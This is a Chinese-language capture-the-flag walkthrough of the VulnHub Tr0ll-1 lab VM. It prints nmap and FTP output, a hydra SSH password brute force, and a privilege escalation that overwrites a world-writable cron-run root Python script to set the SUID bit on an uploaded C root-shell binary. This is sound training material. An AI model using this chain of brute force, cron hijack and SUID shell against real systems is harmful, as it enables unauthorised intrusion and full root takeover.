Tr0ll-1 Writeup
Tr0ll-1 VM下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/
Tr0ll灵感来源于OSCP实验室中那些不断旋转的机器。目标很简单明确,就是获取root权限,从root的根目录里面获取Proof.txt。
难道不是太高,应该不会让做题者沮丧。温馨提醒,前方有巨魔(trolls )!
难度系数:Beginner 类型:boot2root
下载好VM,然后在VMware里面打开,想尽一切办法捣鼓登陆进去获取root权限。
win arp -a一下,Linux netdiscover 也能发现该台VM的ip
环境刺探
nmap全部端口扫起来 看看有哪些猫腻
发现ftp可以匿名访问 有个lol.pcap文件 80端口有个目录/secret
root@kali:~/Desktop# nmap -p 1-65535 -sV -sS -A -T4 192.168.1.105 Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 08:58 EST Nmap scan report for 192.168.1.105 Host is up (0.00057s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap [NSE: writeable] 22/tcp open ssh (protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) |_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/secret |_http-title: Site doesn't have a title (text/html). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port22-TCP:V=6.45%I=7%D=1/8%Time=54AE8D09%P=i686-pc-linux-gnu%r(NULL,29 SF:,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n"); MAC Address: 00:0C:29:DF:FB:D1 (VMware) No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=6.45%E=4%D=1/8%OT=21%CT=1%CU=42233%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM OS:=54AE8D15%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS OS:=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M OS:5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71 OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A= OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T OS:=40%CD=S) Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.57 ms 192.168.1.105 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds
服务枚举 ( Service Enumeration)
端口结果如下:
| Port | Service | Version Detection |
|---|---|---|
TCP: 21 |
FTP | vsftpd 3.0.2 |
TCP: 22 |
SSH | protocol 2.0 |
TCP: 80 |
HTTP | Apache httpd 2.4.7 ((Ubuntu)) |
FTP挖掘 (FTP Enumeration)
root@kali:~/Desktop# ftp 192.168.1.105 Connected to 192.168.1.105. 220 (vsFTPd 3.0.2) Name (192.168.1.105:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap 226 Directory send OK. ftp> get lol.pcap local: lol.pcap remote: lol.pcap 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for lol.pcap (8068 bytes). 226 Transfer complete. 8068 bytes received in 0.03 secs (247.7 kB/s) ftp> exit 221 Goodbye.
ftp匿名登陆anonymous/anonymous 下载到一个网络包lol.pcap
wireshark打开lol.pcap 发现提示:
FTP Data (-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt)
和
FTP Data (Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER!)
鉴于只发现了SSH/FTP/HTTP 所以快速尝试 root/sup3rs3cr3tdirlol 登陆ssh 失败告终!
HTTP枚举(HTTP Enumeration)
nmap --script=http-enum -p80 -n 192.168.1.105
root@kali:~/Desktop# nmap --script=http-enum -p80 -n 192.168.1.105 Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 09:23 EST Nmap scan report for 192.168.1.105 Host is up (0.00048s latency). PORT STATE SERVICE 80/tcp open http | http-enum: | /robots.txt: Robots file |_ /secret/: Potentially interesting folder MAC Address: 00:0C:29:DF:FB:D1 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
web页面打开是这个样子
根据nmap扫描结果,浏览器里访问http://192.168.1.105/secret/目录; 看到一张逗比图片 查看源代码也没发现问题 研究了一下图片 也没啥收获
灵机一动 仔细看这个黑客字符串 是不是说
sup3rs3cr3tdirlol supersecretdirlol super secret dir lol
把上面的sup3rs3cr3tdirlol当做目录一输入 呵呵呵
http://192.168.1.105/sup3rs3cr3tdirlol/
获得一个二进制文件roflmao;strings查找可打印的字符串:
root@kali:~/Desktop/ted# strings roflmao /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used printf __libc_start_main __gmon_start__ GLIBC_2.0 PTRh [^_] Find address 0x0856BF to proceed ;*2$"
看起来二进制程序只是打印了个“0x0856BF”?那就随手在ip后面输入0x0856BF做目录,我也没指望成功,但是奇迹就这么出现了,原来奇迹还是有的,万一你试成功了呢?
第一个目录是这样:
http://192.168.1.105/0x0856BF/good_luck/which_one_lol.txt
maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
第二个目录里面是这个txt:
http://192.168.1.105/0x0856BF/this_folder_contains_the_password/Pass.txt
Good_job_:)
拿which_one_lol.txt做用户名字典 Pass.txt里面的做密码字典 hydra开一个线程小跑一下
root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -P Pass.txt 192.168.1.105 -t 1 ssh -vV Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:36:58 [DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task [DATA] attacking service ssh on port 22 [VERBOSE] Resolving addresses ... done [ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0] [ERROR] could not connect to target port 22 [ERROR] ssh protocol error [VERBOSE] Retrying connection for child 0 [RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0] [ERROR] could not connect to target port 22 [ERROR] ssh protocol error [VERBOSE] Retrying connection for child 0 [RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0] [ERROR] could not connect to target port 22 [ERROR] ssh protocol error [ERROR] Too many connect errors to target, disabling ssh://192.168.1.105:22 0 of 1 target completed, 0 valid passwords found [ERROR] 1 target did not resolve or could not be connected Hydra (http://www.thc.org/thc-hydra) finished at 2015-01-08 09:36:59
爆破最后出错 没成功 估计是iptables做了限制 想半天 最后试了一下密码就是"Pass.txt" 淡淡的忧伤
root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -p Pass.txt 192.168.1.105 -t 1 ssh -vV
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:38:13
[DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Pass.txt" - 1 of 10 [child 0]
[22][ssh] host: 192.168.1.105 login: overflow password: Pass.txt
[ATTEMPT] target 192.168.1.105 - login "maleus" - pass "Pass.txt" - 2 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "ps-aux" - pass "Pass.txt" - 3 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "felux" - pass "Pass.txt" - 4 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "Eagle11" - pass "Pass.txt" - 5 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "genphlux" - pass "Pass.txt" - 6 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "usmc8892" - pass "Pass.txt" - 7 of 10 [child 0]
权限提升
登陆进去发现权限不够 是要提权的节奏 而且登录一段时间就被踢出来 提示TIMES UP LOL!
root@kali:~# ssh 192.168.1.105 -l overflow The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established. ECDSA key fingerprint is 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.105' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) * Documentation: https://help.ubuntu.com/ The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jan 8 06:45:19 2015 Could not chdir to home directory /home/overflow: No such file or directory $ id uid=1002(overflow) gid=1002(overflow) groups=1002(overflow) $
下载脚本 枚举可写文件
######################################### ## 777 Files ## ######################################### /srv/ftp/lol.pcap /var/tmp/cleaner.py.swp /var/www/html/sup3rs3cr3tdirlol/roflmao /var/log/cronlog /lib/log/cleaner.py
/lib/log/cleaner.py 文件具备root权限 而且被crontab 定时清除tmp目录
opt/lmao.py没有权限查看 那么覆盖cleaner.py
os.system('/opt/lmao.py > /tmp/out.txt')
在out.txt看到lmao.py代码
#!/usr/bin/env python
import os
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()
编译我们的suid , wget上去
int main(void) {
setgid(0); setuid(0);
system("/bin/bash");
}
果断替换cleaner.py文件为:
#!/usr/bin/env python
import os
import sys
try:
os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
sys.exit()
过会儿重连 执行我们的suid就root了
:# /var/tmp/suid :# cat /root/proof.txt Good job, you did it! 702a8c18d29c6f3ca0d99ef5712bfbdc :# id uid=0(root) gid=0(root) groups=0(root),1002(overflow) :# whoami root
【参考:Tr0ll 1 Walkthrough & THERE BE TROLLS AHEAD! 作者:上头欢乐送 】